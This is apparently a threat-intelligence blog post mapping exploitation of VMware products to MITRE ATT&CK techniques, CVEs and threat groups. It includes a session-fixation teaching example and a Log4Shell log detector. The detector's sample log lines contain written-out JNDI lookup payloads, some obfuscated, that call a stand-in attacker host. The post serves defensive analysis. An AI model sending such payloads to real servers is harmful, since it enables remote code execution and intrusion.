Optiv’s gTIC Prioritized Software and Services List + MITRE Tactics Part V: VMware Software and Products
This blog post is a continuation of our Optiv Global Threat Intelligence Center’s (gTIC) Prioritized Software and Services List series. The list provides a high-level introduction to frequently exploited software, services, and protocols and their associated MITRE ATT&CK Tactic mappings. The intent of researching, identifying, and prioritizing potentially high-risk products (based on how attractive they are to adversaries and how frequently they are targeted) is to supplement and support enterprise risk management, incident response preparedness, intelligence collection, and threat research. Follow-up reports will cover more details on adversaries, vulnerabilities, techniques, and real-world incidents (where applicable) pertaining to many of the software and services outlined in the original blog post.
This fifth blog post in the series covers exploitation trends and vulnerabilities in popular VMware products to support the gTIC’s inclusion of VMware products on our Prioritized Software and Services List.
Optiv’s gTIC has identified and categorized VMware as a Critical Enterprise Software vendor. As described in our initial “Prioritized Software and Services List,” products and software that fall under the category of “Critical Enterprise Software” are considered essential to business processes and continuity. These products enable internal and external system communications; web and application servers; and file and data hosting, management, storage, and sharing. Adversaries target these types of software and products to perform various actions, including accessing and exfiltrating data, gaining Initial Access through phishing (with malware or for credential theft), scanning and exploitation of insecure web-facing instances, installing backdoors and web shells to achieve Persistence, enumerating user credentials and privileges, discovering sensitive databases, and mapping out other parts of the network and environment.
VMware software includes some of the most widely used cloud and virtualization solutions in enterprise environments. The elevated risk profile for applicable organizations is based on the ubiquity of VMware products, as well as the severity and notoriety of known vulnerabilities and real-world compromises. While multiple VMware products have a strong presence in corporate environments globally, some are more frequently reported on than others. These include (but are not limited to) VMware vCenter, Workspace ONE, ESXi, vSphere, and Horizon. Independent of report frequency, if your organization owns or uses these or any other popular VMware products, prioritize accordingly.
Reports and observations show that adversaries leverage VMware products across 10 Tactics of the MITRE ATT&CK framework. Specific MITRE ATT&CK Techniques observed under those Tactics include the following:
T1583.005 – Acquire Infrastructure: Botnet: EnemyBot implemented exploits for VMware Workspace ONE Access and Identity Manager to identify and infect new devices and assets for use in future denial-of-service attacks.
T1190 – Exploit Public-Facing Application: Remote code execution (RCE) vulnerabilities in VMware ESXi remain one of the most favored attack vectors for adversaries to gain a foothold and execute malicious code in victim environments. As recently as mid-2022, the Log4Shell vulnerability (CVE-2021-44228) was reportedly exploited to compromise VMware Horizon servers for Initial Access. Endpoints hosting vulnerable instances of vCenter Server can be exploited for Initial Access and chained with other VMware vulnerabilities for a complete system takeover.
T1203 – Exploitation for Client Execution: Exploitation of vulnerabilities in several VMware products, including Workspace ONE, vRealize, and ESXi, can allow adversaries to run malicious code remotely to install ransomware and cryptocurrency miners, copy files and directories from one location to another, or take full control over a client or system. (Note that ATT&CK scopes T1203 to client applications such as browsers and office software; exploitation of the server-side VMware services named here is more conventionally recorded under T1190 or T1210.)
T1068 – Exploitation for Privilege Escalation: A local privilege escalation (LPE) vulnerability in VMware vCenter, CVE-2021-22015, was tested and proven to allow a low-privileged user to gain root access to the vCenter host. This can allow access to files and processes to reveal hashed credentials or run malicious code and scripts at root level.
T1211 – Exploitation for Defense Evasion: Exploitation of multiple access control and authentication vulnerabilities disclosed in 2022 in VMware Workspace ONE Assist (CVE-2022-31685, CVE-2022-31686, and CVE-2022-31687) allows threat actors to bypass authentication mechanisms.
T1134.001 – Token Impersonation/Theft: A session fixation vulnerability in VMware Workspace ONE Assist, CVE-2022-31689, resulted from improper handling of session tokens. It could allow an actor with existing network and environment access to obtain and reuse a valid session token to bypass authentication in Workspace ONE Assist.
T1562.001 – Impair Defenses: Disable or Modify Tools: Elevated privileges in clients and consoles like vCenter have allowed threat actors to modify rules and controls in local firewalls to gain access to other environments like ESXi without detection.
T1212 – Exploitation for Credential Access: Adversaries can exploit vulnerabilities in endpoints hosting vCenter servers, like CVE-2022-22948, to obtain credentials to other sensitive systems—resulting in a chaining of multiple techniques and vulnerabilities for higher or complete system takeover.
T1555 – Credentials from Password Stores: vCenter has been exploited to acquire credentials from an attached or embedded PostgreSQL server to pivot to other connected VMware systems like ESXi.
T1018 – Remote System Discovery: Enumeration of hosts (e.g., ESXi) and virtual machines from management consoles like vCenter allows attackers visibility into connected services and systems for further deployment of backdoors and tools to elevate privileges or pivot to discovered systems.
T1210 – Exploitation of Remote Services: Exploitation and access into VMware consoles and clients can allow attackers to gain access to managed or connected hosts, virtual machines, and servers, which allows propagation across multiple systems.
T1005 – Data from Local System: Vulnerabilities in ESXi have been exploited to transfer files from the compromised ESXi host to and from guest VMs.
T1486 – Data Encrypted for Impact: Ransomware has been deployed as a secondary and post-intrusion technique following the compromise of multiple VMware services, including VMware Workspace ONE, vSphere, and ESXi.
T1496 – Resource Hijacking: A server-side template injection vulnerability in VMware Workspace ONE (CVE-2022-22954) was previously exploited to deliver ransomware, as well as the GuardMiner cryptocurrency miner.
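The session fixation weakness listed under T1134.001 above is easiest to understand next to its fix. The following toy session store is an added illustration of the vulnerability class only; it is not VMware code and does not reproduce the Workspace ONE Assist flaw itself. The in-memory store, the `login` entry point and the out-of-band step in which the attacker plants a session ID in the victim's browser are all assumptions of the example.

```python
"""Session fixation: a vulnerable login flow beside the hardened one.

Added example (not VMware code). Toy in-memory session store; the attacker's
ability to fix a session ID in the victim's browser is assumed out-of-band.
"""
import secrets
from dataclasses import dataclass
from typing import Optional


@dataclass
class Session:
    user: Optional[str] = None  # None until the session is authenticated


class VulnerableSessionStore:
    """Keeps the pre-authentication session ID across login.

    An attacker who can plant a session ID in the victim's browser (via a
    crafted link, a cookie-setting sibling host, etc.) already knows the ID.
    Once the victim authenticates, that same ID now names a logged-in session,
    so the attacker impersonates the victim without ever seeing a password.
    """

    def __init__(self) -> None:
        self.sessions: dict[str, Session] = {}

    def new_session(self) -> str:
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = Session()
        return sid

    def login(self, sid: str, user: str) -> str:
        # BUG: authenticates whatever ID the client presented, attacker-chosen or not.
        self.sessions.setdefault(sid, Session()).user = user
        return sid


class HardenedSessionStore(VulnerableSessionStore):
    """Rotates the session ID at the privilege boundary (login)."""

    def login(self, sid: str, user: str) -> str:
        self.sessions.pop(sid, None)  # invalidate the pre-auth ID the client sent
        new_sid = secrets.token_urlsafe(32)  # fresh, unpredictable ID for the authed session
        self.sessions[new_sid] = Session(user=user)
        return new_sid


def fixation_attack(store: VulnerableSessionStore) -> bool:
    """Simulate the attack; True means the attacker's planted ID is now the victim's session."""
    attacker_sid = store.new_session()  # attacker obtains a valid pre-auth ID ...
    # ... and fixes it in the victim's browser (assumed out-of-band), then the victim logs in:
    store.login(attacker_sid, "victim")
    hijacked = store.sessions.get(attacker_sid)
    return hijacked is not None and hijacked.user == "victim"


if __name__ == "__main__":
    print("vulnerable store hijacked:", fixation_attack(VulnerableSessionStore()))
    print("hardened store hijacked:  ", fixation_attack(HardenedSessionStore()))
```

The hardened version also gives the server a natural place to bind the new ID to a `Secure`/`HttpOnly` cookie and to refuse IDs it never issued; the key property is that no identifier known before authentication is valid after it.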
The following chart shows the most popular and widely covered VMware products—Workspace ONE suite, vSphere, ESXi, vCenter, and VMware Horizon—mapped to various MITRE Tactics. The chart also shows associated threats, including malware, adversaries, and popular vulnerabilities assessed to pose a high risk to organizations or that cyber adversaries have exploited over the last 24 months.
Cyber adversaries are known to exploit vulnerabilities in VMware products to accomplish numerous objectives. These objectives include delivering various types of payloads and implants like backdoors and web shells, deploying ransomware to destroy virtual and backup environments, exploiting systems for Initial Access and discovery of the compromised environment, and establishing a foothold for botnets. Research and observed incidents of compromises involving VMware exploits also validate Optiv gTIC’s long-standing assessment that threat actors will continue to exploit old vulnerabilities (two years and older) in popular software and services due to the continued demonstrable, proven exploit success over time.
Beyond zero-day exploitation, research shows that adversaries have scanned for and exploited critical vulnerabilities in VMware ESXi, Horizon, vCenter, vSphere, and Workspace ONE within 48 hours of public disclosure. It is therefore highly time sensitive for enterprises to prioritize VMware software assets in their asset inventory and defense-in-depth program. Threat actors known to have exploited VMware products as part of their campaigns include the state-sponsored groups Lazarus (Democratic People’s Republic of Korea) and APT35 (Iran). Multiple ransomware cartels, including the Conti, AvosLocker, RansomExx, and Hive groups, have also exploited VMware products. This is Likely due to VMware’s ubiquity across enterprise environments, its management role and access to data and accounts, and its frequently internet-facing position, which make critical vulnerabilities in these products a key target for Initial Access, Discovery, and Privilege Escalation.
Remote Code Execution (RCE) vulnerabilities (for example, via server-side template injection) and authentication bypass vulnerabilities in VMware products are among the most critical types of vulnerabilities. These vulnerabilities allow attackers to execute code, upload arbitrary files, or gain unauthorized privileged and root-level access to sensitive systems. Adversaries can also steal credentials from VMware consoles and connected databases to elevate privileges, manipulate, add, or delete defensive measures, credentials, and files, and gain access to sensitive directories and systems.
Vulnerabilities found in ESXi from 2019-2021 (e.g., CVE-2019-5544 and CVE-2020-3992) were observed in exploitation attempts as recently as 2022 and 2023, including in ransomware incidents (e.g., the ESXiArgs and RansomExx campaigns). Affiliates and operators of multiple ransomware groups, including Alphv/BlackCat, AvosLocker, Babuk, REvil/Sodinokibi, and DarkSide/BlackMatter, have been observed exploiting ESXi to deploy post-exploitation tools and encryption malware. ESXi is also favored for Initial Access and post-exploitation operations by APT groups such as UNC3886, which leveraged a zero-day in VMware Tools (CVE-2023-20867) from already-compromised ESXi hosts to run privileged guest operations without authenticating to the guest, supporting Privilege Escalation, Defense Evasion, and Execution. VMware ESXi is Very Likely to remain a target of exploitation by both cybercriminals (including extortion groups) and state-sponsored APT groups engaged in cyber espionage.
Widely embedded libraries and frameworks like Log4j and Spring (owned by VMware) are also attractive to adversaries, because a single flaw can be exploited against every product that ships them. North Korea’s Lazarus APT group exploited the December 2021 Log4j vulnerability (CVE-2021-44228, Log4Shell) in VMware Horizon instances in a campaign observed between February and July 2022 to gain Initial Access to targets in the U.S. and South Korea. Post-exploitation activity included installing various backdoors for Persistence and Command and Control.
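The Horizon compromises described above (under T1190 and in the Lazarus campaign) start with a Log4Shell lookup string arriving in a request header or parameter, and real traffic rarely contains the textbook `${jndi:ldap://...}` form: in-the-wild payloads nest `${lower:j}` or `${::-j}` lookups and URL-encode the string to defeat naive matching. The following detector is an added example, not code from Optiv or VMware; the access-log lines are constructed, the field layout assumed is the common combined log format with the payload in the User-Agent or query string, and the de-obfuscation handles the nested-lookup evasions that were most common rather than every possible variant.

```python
"""Flag Log4Shell (CVE-2021-44228) JNDI lookup strings in web server logs.

Added detection example; the log lines are constructed, not from any incident.
De-obfuscation resolves the common nested ${lower:x}, ${upper:x} and ${::-x}
lookups before matching, so the evasions below are caught as well as the plain form.
"""
import re
from urllib.parse import unquote

# Constructed combined-format access log lines (assumed layout: source IP first,
# User-Agent last). 198.51.100.7 (TEST-NET-2) plays the attacker.
SAMPLE_LOGS = [
    '10.0.0.5 - - [12/Feb/2022:03:14:07 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 1543 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Feb/2022:03:14:09 +0000] "GET /portal/ HTTP/1.1" 200 88 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [12/Feb/2022:03:14:11 +0000] "GET /portal/ HTTP/1.1" 200 88 "-" "${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://198.51.100.7/x}"',
    '198.51.100.7 - - [12/Feb/2022:03:14:12 +0000] "GET /portal/?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.7 - - [12/Feb/2022:03:14:13 +0000] "GET /portal/ HTTP/1.1" 200 88 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7/x}"',
    '10.0.0.9 - - [12/Feb/2022:03:15:00 +0000] "GET /index.html HTTP/1.1" 200 10 "-" "${env:HOME}"',
]

# Innermost lookups that resolve to one literal character:
#   ${lower:X} / ${upper:X}           -> X
#   ${anything:-X} (e.g. ${::-X})     -> X   (Log4j default-value syntax)
_SIMPLE = re.compile(r"\$\{(?:lower|upper):([^${}])\}|\$\{(?:[^${}]*):-([^${}])\}")
# The lookup that actually triggers an outbound JNDI fetch.
_JNDI = re.compile(r"\$\{jndi:(?:ldap|ldaps|rmi|dns|iiop|corba|nds|http)s?://", re.IGNORECASE)


def deobfuscate(s: str, max_rounds: int = 10) -> str:
    """URL-decode, then collapse nested single-character lookups until stable."""
    s = unquote(s)
    for _ in range(max_rounds):  # bounded: a hostile line cannot loop us forever
        new = _SIMPLE.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), s)
        if new == s:
            break
        s = new
    return s


def is_log4shell_probe(line: str) -> bool:
    """True if the (de-obfuscated) line carries a JNDI lookup with a remote scheme."""
    return _JNDI.search(deobfuscate(line)) is not None


def scan_log(lines):
    """Return (source_ip, decoded_line) for every line that carries a JNDI lookup."""
    hits = []
    for line in lines:
        if is_log4shell_probe(line):
            src = line.split(" ", 1)[0]  # assumed: client IP is the first field
            hits.append((src, deobfuscate(line)))
    return hits


if __name__ == "__main__":
    for src, decoded in scan_log(SAMPLE_LOGS):
        print(f"[!] Log4Shell probe from {src}: {decoded}")
```

Two design points matter in practice: match after decoding and lookup-collapsing rather than on the raw line, and treat a hit as a probe rather than a confirmed compromise; the callback host in the payload (here 198.51.100.7) is what to pivot on in egress logs to confirm whether the Horizon host actually reached out.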
Much as exploit kits evolve, botnets add exploits and tooling to their multi-module malware. EnemyBot, a prolific open-source botnet, is reportedly developed and maintained by threat actors who adapt quickly to new attack vectors: its operators frequently update the malware to scan for newly disclosed vulnerabilities, sometimes within 24 hours of disclosure (so-called one-day vulnerabilities). In 2022, EnemyBot added scanning and exploit capability for multiple vulnerabilities in popular software and services, including an RCE vulnerability in VMware Workspace ONE (CVE-2022-22954).
While not the focus of this blog post, Optiv’s gTIC also recognizes other VMware products that threat actors are Likely to exploit. While we will cover remote management software in a separate report, it is evident that products like VMware SaltStack are popular attack vectors for cyber adversaries.
The graphics below illustrate Optiv gTIC’s Threat Actor Metric™ calculated for selected cyber threat actors known to leverage VMware vCenter, Workspace ONE, ESXi, and Horizon as part of their attacks (see Appendix: References for an explanation of the Threat Actor Metric™).
Optiv Threat Actor Metric™ – The Optiv Threat Actor Metric™ was developed by Optiv’s gTIC and is a multi-faceted, qualitative approach to determining a cyber adversary’s or campaign’s potential threat to an organization or industry. The metric considers known and assessed non-technical capabilities and intentions and is scored out of a possible 100. Its purpose is to add depth to risk-based intelligence analysis and to support proactive and remediating recommendations by visualizing the non-technical, qualitative risk factors of adversaries and threat campaigns. It is similar in function to the United States Department of Defense’s CARVER targeting scale.
Link charts and graphs in this report were created by Optiv's gTIC leveraging the ThreatQuotient® Investigations platform.
In addition to Optiv’s own Enterprise Incident Management team’s incident response engagements and analysis and other sensitive sources, the following references provided additional information for this blog post:
Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems | CISA
ESXi-Targeting Ransomware: The Threats That Are After Your Virtual Machines (Part 1) | VMware Security Blog
In Before The Lock: ESXi | Recorded Future
Rapidly evolving IoT malware EnemyBot now targeting Content Management System servers and Android devices | AT&T
VMware ESXi Servers: A Major Attack Vector for Ransomware | Forescout
CVE-2022-22948: Sensitive Information Disclosure in VMware vCenter | Pentera
VMware ESXi Zero-Day Used by Chinese Espionage Actor to Perform Privileged Guest Operations on Compromised Hypervisors | Mandiant
vScalation (CVE-2021-22015)- Local Privilege Escalation in VMware vCenter | Pentera
Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability
VMware Security Advisory for CVE-2022-31685
VMSA-2022-0011: Questions & Answers
Lazarus Group Exploiting Log4Shell Vulnerability (NukeSped) | ASEC
Lazarus and the tale of three RATs | Talos Intelligence
Most Likely Course of Action (MLCOA) – The expected and probable tactics, techniques, and actions carried out by a threat actor. COA statements are well established and accepted in estimative and predictive intelligence assessments.
Most Dangerous Course of Action (MDCOA) – Tactics, techniques, or actions carried out or taken by an adversary that result in a worst-case scenario outcome or impact, regardless of probability. COA statements are well established and accepted in estimative and predictive intelligence assessments.
Words of Estimated Probability – Optiv’s gTIC employs the use of both probability statements for likelihood of events or actions and confidence levels for analytic assessments and judgements. Probability statements and confidence statements are inherently subjective; however, the gTIC leverages professional experience and intelligence fundamentals to deliver reasonable and relevant statements and assessments. Probability statements and the degree of likelihood of an assessed event/incident are modeled after the Intelligence Community Directive (ICD) 203: Analytic Standards, published by the United States’ Office of the Director of National Intelligence (ODNI), and are as follows:
Confidence statements, as defined by the gTIC, apply to reliability and relevance of information reported and are as follows:
Per ICD 203 standards, confidence-level statements are not combined with probability and degree of likelihood terms proposed in the above chart.